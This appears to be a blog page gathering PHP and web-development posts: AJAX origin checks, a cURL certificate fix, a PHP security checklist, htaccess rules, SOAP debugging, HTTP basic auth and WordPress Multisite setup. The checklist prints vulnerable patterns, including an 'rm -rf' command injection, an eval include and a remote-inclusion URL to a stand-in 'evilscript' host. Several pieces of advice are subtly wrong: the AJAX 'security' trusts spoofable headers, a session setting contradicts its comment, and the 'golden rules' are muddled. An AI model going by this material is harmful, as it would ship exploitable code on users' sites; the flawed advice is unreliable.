Showing posts with label htaccess. Show all posts
Showing posts with label htaccess. Show all posts

Securing AJAX Requests ( How to prevent ajax request from another domain )

if (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest') {

  // Do Something

}

if(isset($_SERVER['HTTP_REFERER']) && $_SERVER['HTTP_REFERER']=="http://yourdomain/ajaxurl")
{

 //Request identified as ajax request

}

if (strpos($_SERVER['HTTP_REFERER'], 'yourdomain.com')) {

   // check Request from same origin

}

/*
* in case of form post.
*/

if (isset($_SERVER['HTTP_ORIGIN']) && $_SERVER['HTTP_ORIGIN'] == 'http://www.yourdomain.club') {
 // check origin
}

Resolved : cURL error 60: SSL certificate: unable to get local issuer certificate

working solution:

•   Assuming On windows

XAMPP server

similar for other environment - download and extract for cacert.pem here (a clean file format/data)


•             put it here

C:\xampp\php\extras\ssl\cacert.pem

•             in your php.ini put this line in this section:

;;;;;;;;;;;;;;;;;;;;
; php.ini Options  ;
;;;;;;;;;;;;;;;;;;;;

curl.cainfo = "C:\xampp\php\extras\ssl\cacert.pem"

•             restart your webserver/apache


Problem solved!


Golden Rules of programming


1 . The AND operator is used when we use (=) and the operator OR is used when we use (!=)
2. True ( || )     False ( && )

Comments urs.

How to Secure PHP Web Applications and Prevent Attacks?

As a developer you must know how to build a secure and bulletproof application. Your duty is to prevent security attacks and secure your application.

Checklist of PHP and Web Security Issues

Make sure you have these items sorted out when deploying your application into production environment:
  1. ✔ Cross Site Scripting (XSS)
  2. ✔ Injections
  3. ✔ Cross Site Request Forgery (XSRF/CSRF)
  4. ✔ Public Files
  5. ✔ Passwords
  6. ✔ Uploading Files
  7. ✔ Session Hijacking
  8. ✔ Remote File Inclusion
  9. ✔ PHP Configuration
  10. ✔ Use HTTPS
  11. ✔ Things Not Listed

Cross Site Scripting (XSS)

XSS attack happens where client side code (usually JavaScript) gets injected into the output of your PHP script.
// GET data is sent through URL: http://example.com/search.php?search=
$search = $_GET['search'] ?? null;
echo 'Search results for '.$search;

// This can be solved with htmlspecialchars
$search = htmlspecialchars($search, ENT_QUOTES, 'UTF-8');
echo 'Search results for '.$search;
  • ENT_QUOTES is used to escape single and double quotes beside HTML entities
  • UTF-8 is used for pre PHP 5.4 environments (now it is default). In some browsers some characters might get pass thehtmlspecialchars().

Injections

SQL Injection

When accessing databases from your application, SQL injection attack can happen by injecting malicious SQL parts into your existing SQL statement.

Directory Traversal (Path Injection)

Directory traversal attack is also known as ../ (dot, dot, slash) attack. It happens where user supplies input file names and can traverse to parent directory. Data can be set as index.php?page=../secret or /var/www/secret or something more catastrophic:
$page = $_GET['page'] ?? 'home';

require $page;
// or something like this
echo file_get_contents('../pages/'.$page.'.php');
In such cases you must check if there are attempts to access parent or some remote folder:
// Checking if the string contains parent directory
if (strstr($_GET['page'], '../') !== false) {
    throw new \Exception("Directory traversal attempt!");
}

// Checking remote file inclusions
if (strstr($_GET['page'], 'file://') !== false) {
    throw new \Exception("Remote file inclusion attempt!");
}

// Using whitelists of pages that are allowed to be included in the first place
$allowed = ['home', 'blog', 'gallery', 'catalog'];
$page = (in_array($page, $allowed)) ? $page : 'home';
echo file_get_contents('../pages/'.$page.'.php');

Command Injection

Be careful when dealing with commands executing functions and data you don’t trust.
exec('rm -rf '.$GET['path']);

Code Injection

Code injection happens when malicious code can be injected in eval() function, so sanitize your data when using it:
eval('include '.$_GET['path']);

Cross Site Request Forgery (XSRF/CSRF)

Cross site request forgery or one click attack or session riding is an exploit where user executes unwanted actions on web applications.

Public Files

Make sure to move all your application files, configuration files and similar parts of your web application in a folder that is not publicly accessible when you visit URL of web application. Some file types (for example .yml files) might not be processed by your web server and user can view them online.
Example of good folder structure:
app/
  config/
    parameters.yml
  src/
public/
  index.php
  style.css
  javascript.js
  logo.png
Configure web server to serve files from public folder instead of your application root folder. Public folder contains the front controller (index.php). In case web server gets misconfigured and fails to serve PHP files properly only source code of index.php will be visible to public.

Passwords

When working with user’s passwords hash them properly with password_hash() function.

Uploading Files

A lot of security breaches happen where users can upload a file on server. Make sure you go through all the vulnerabilities of uploading files such as renaming uploaded file, moving it to publicly unaccessible folder, checking file type and similar. Since there are a lot of issues to check here, more information is located in the separate FAQ:

Session Hijacking

Session hijacking is an attack where attacker steals session ID of a user. Session ID is sent to server where $_SESSION array gets populated based on it. Session hijacking is possible through an XSS attack or if someone gains access to folder on server where session data is stored.

Remote File Inclusion

Remote file inclusion attack (RFI) means that attacker can include custom scripts:
$page = $_GET['page'] ?? 'home'

require $page . '.php';
In above code $_GET can be set to a remote file http://yourdomain.tld/index.php?page=http://example.com/evilscript
Make sure you disable this in your php.ini unless you know what you’re doing:
; Disable including remote files
allow_url_fopen = off
; Disable opening remote files for include(), require() and include_once() functions.
; If above allow_url_fopen is disabled, allow_url_include is also disabled.
allow_url_include = off

PHP Configuration

Always keep installed PHP version updated. You can use versionscan to check for possible vulnerabilities of your PHP version. Update open source libraries and applications and maintain web server.
Here are some of the important settings from php.ini that you should check out. You can also use iniscan to scan your php.ini files for best security practices.

Error Reporting

In your production environment you must always turn off displaying errors to screen. If errors occur in your application and they are visible to the outside world, attacker can get valuable data for attacking your application. display_errors and log_errors directives inphp.ini file:
; Disable displaying errors to screen
display_errors = off
; Enable writing errors to server logs
log_errors = on

Exposing PHP Version

PHP version is visible in HTML headers. You might want to consider hiding PHP version by turning off expose_php directive and prevent web server to send back header X-Powered-By:
expose_php = off

Remote Files

In most cases it is important to disable access to remote files:
; disabled opening remote files for fopen, fsockopen, file_get_contents and similar functions
allow_url_fopen =  0
; disabled including remote files for require, include ans similar functions
allow_url_include = 0

open_basedir

This settings defines one or more directories (subdirectories included) where PHP has access to read and write files. This includes file handling (fopenfile_get_contents) and also including files (includerequire):
open_basedir = "/var/www/test/uploads"

Session Settings

  • session.use_cookies and session.use_only_cookies
    PHP is by default configured to store session data on the server and a tracking cookie on client side (usually called PHPSESSID) with unique ID for the session.
; in most cases you'll want to enable cookies for storing session
session.use_cookies = 1
; disabled changing session id through PHPSESSID parameter (e.g foo.php?PHPSESSID=)
session.use_only_cookies = 1
session.use_trans_sid = 0
; rejects any session ID from user that doesn't match current one and creates new one
session.use_strict_mode = 0
  • session.cookie_httponly
    If the attacker somehow manages to inject Javascript code for stealing user’s current cookies (the document.cookie string), theHttpOnly cookie you’ve set won’t show up in the list.
session.cookie_httponly = 1
  • session.cookie_domain
    This sets the domain for which cookies apply. For wildcard domains you can use .example.com or set this to the domain it should be applied. By default it is not enabled, so it is highly recommended for you to enable it:
session.cookie_domain = example.com
  • session.cookie_secure
    For HTTPS sites this accepts only cookies sent over HTTPS. If you’re still not using HTTPS, you should consider it.
session.cookie_secure = 1

Use HTTPS

HTTPS is a protocol for secure communication over network. It is highly recommended that you enable it on all sites. Read more about HTTPS in the dedicated FAQ: How to Install SSL Certificate and Enable HTTPS.

What is Next?

Above we’ve introduced many security issues. Security, attacks and vulnerabilities are continuously evolving. Take time and check some good resources to learn more about security and turn this check list into a habit:

Remove PHP Extension from URL Using Htaccess URL Rewrite Rule

RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME}.php -f
RewriteRule ^(.*)$ $1.php [NC,L]

In this above code we have used the Rewrite Rule and removed the .php extension from all the URL which fulfill the rule.

SOAP-ERROR: Parsing WSDL: Couldn't load from

For some versions of php, the SoapClient does not send http user agent information. What php versions do you have on the server vs your local WAMP?
Try to set the user agent explicitly, using a context stream as follows:
try{

    $opts = array(
        'http'=>array(
            'user_agent' => 'PHPSoapClient'
            )
        );

    $context = stream_context_create($opts);
    $client = new SoapClient('http://ec.europa.eu/taxation_customs/vies/checkVatService.wsdl',
                             array('stream_context' => $context,
                                   'cache_wsdl' => WSDL_CACHE_NONE));

    $result = $client->checkVat(array(
                                    'countryCode' => 'DK',
                                    'vatNumber' => '47458714'
                                    ));
    print_r($result);
}
catch(Exception $e){
    echo $e->getMessage();
}

if  still not work check below Conditions


The combination of HTTP over IPv6, and missing HTTP User Agent string, seems to give the web service problems.

To verify this, try the following on your linux host:
curl  -A ''  -6 http://ec.europa.eu/taxation_customs/vies/checkVatService.wsdl
this IPv6 request fails.
curl  -A 'cURL User Agent'  -6 http://ec.europa.eu/taxation_customs/vies/checkVatService.wsdl
this IPv6 request succeeds.
curl  -A ''  -4 http://ec.europa.eu/taxation_customs/vies/checkVatService.wsdl
curl  -A 'cURL User Agent'  -4 http://ec.europa.eu/taxation_customs/vies/checkVatService.wsdl
both these IPv4 request succeeds.
Interesting case :) I guess your linux host resolves ec.europa.eu to its IPv6 address, and that your version of SoapClient did not add a user agent string by default.

Using Basic access authentication HTTP Auth With PHP

How to set up your App in a way that the browser prompts for username/password.


Problem

You probably don't want the whole world to see your development in progress. So you want to restrict access to a fortunate few using HTTP (basic) auth. In the fortrabbit PHP/FPM infrastructure neither PHP_AUTH_USER nor PHP_AUTH_PW are available - but you can hack around easily.


Solution

To utilize HTTP (basic) Auth, you need to add a directive in your .htaccess file, forwarding the Authorization header as an environment variable. This variable then contains the base64 encoded authentication data, which you can then decode to the PHP_AUTH_USER and PHP_AUTH_PW.

Modify .htaccess file


RewriteCond %{HTTP:Authorization} .
RewriteRule .* - [E=REMOTE_USER:%{HTTP:Authorization}]


Decode auth header in PHP


// header was not provided

if (empty($_SERVER['REMOTE_USER'])) {
    header('WWW-Authenticate: Basic realm="My Realm"');
    header('HTTP/1.0 401 Unauthorized');
    echo 'Need auth!';
    exit;
}

// extract user and pw from encoded auth data
list($_SERVER['PHP_AUTH_USER'], $_SERVER['PHP_AUTH_PW']) = explode(
    ':',
    base64_decode(substr($_SERVER['REMOTE_USER'], 6))
);


Quick WordPress Multisite (MU) Installation and Setup for Different Domains and Sites

WordPress Multisite (or Network) is 1 wordpress installation that enables hosting of multiple different websites and domain names.
WordPress Multisite uses the same wordpress base (including the themes and plugins), wordpress database, and wp-config.php configuration file – for all sites in the network.
To install and use WP MU (Multisite), you would:
  1. Install WordPress on a base website and domain. This installation will provide for all your MU sites.
  2. Activate (turn on) Multisite / Network:
    1. Edit wp-config.php
      define( 'WP_ALLOW_MULTISITE', true );
    2. Go to Tools > Network Setup, select to use: sub-domains, and provide the asked “network” details (primary: domain, title, mail address). Install.
    3. Make sure the displayed wp-config.php and .htaccess changes are made (and if not made automatically, make edits manually).
  3. Install the “WordPress MU Domain Mapping” plugin to be able to use separate domain names for different sites (otherwise you’ll only be able to use sub-domains for sites, such as: site1.example.com, site2.example.com, site3.example.com).
  4. In the website’s settings (or directly in the HTTP and SSL VirtualHost files), add your list of sub-domains and full-domains into theServerAlias field. Make sure redirects are turned off.
  5. If hosting (i.e., not local dev), you’ll need to make sure that you have proper DNS set up for:
    • Each site’s domain name with a “CNAME” record resolving to the base (primary) domain name.
    • Wildcard (*) on the base (primary) domain’s host (sub-domains) with a “A” record resolving to the server’s IP address.
    • And of course the base domain name resolved to the server’s IP address.
  6. Make sure to clear your Browser’s cookies and cache.